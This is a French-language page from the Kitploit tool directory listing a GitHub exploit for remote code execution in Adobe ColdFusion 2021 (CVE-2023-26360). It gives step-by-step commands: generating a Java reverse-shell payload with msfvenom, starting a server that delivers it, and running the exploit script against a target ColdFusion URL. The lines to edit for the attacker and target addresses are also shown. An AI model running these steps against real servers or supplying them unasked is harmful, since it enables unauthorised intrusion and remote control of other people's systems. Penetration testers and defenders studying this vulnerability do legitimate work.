Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-26360-RCE — Exploit pour l'exécution de code à distance dans ColdFusion 2021 (CVE-2023-26360) | Kitploit
Outils/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

Exploit pour l'exécution de code à distance dans ColdFusion 2021 (CVE-2023-26360)

Voir le dépôt
113il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-26360 - Exécution de code à distance sur ColdFusion 2021

Parfois, les scripts ne fonctionnent pas du premier coup. Essayez plusieurs fois pour que cela fonctionne

Comment exécuter

Créer un payload avec msfvenom

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

Démarrer server.py

  • Ce serveur enverra le payload au serveur ColdFusion après l'accès initial avec cve.2023-26360.py, il doit donc être initialisé en premier.
root@kitploit:~
python3 server.py 8000
  • L'argument 8000 est le port sur lequel le serveur écoutera.

  • Il est important de noter que la ligne 12 configure l'adresse IP du serveur, alors modifiez-la :

  • root@kitploit:~
    s.bind(('192.168.56.1',port))
    

    Exécuter cve-2023-26360.py

    • Pour exécuter l'exploit, lancez :
    root@kitploit:~
    python3 cve-2023-26360.py 8000
    
    • Comme pour server.py, l'argument 8000 est le port sur lequel server.py écoutera. Il doit donc être identique dans les deux commandes.

    • La ligne 8 de cve-2023-26360.py définit l'adresse IP sur laquelle server.py écoutera. Il est nécessaire de la configurer correctement.

    • La ligne 11 de cve-2023-26360.py définit l'adresse IP du serveur ColdFusion, modifiez-la donc :

    root@kitploit:~
    url = "http://192.168.56.102:8500"
    

    Testé sur

    • ColdFusion 2021 - Windows Server 2019
    Télécharger l’outil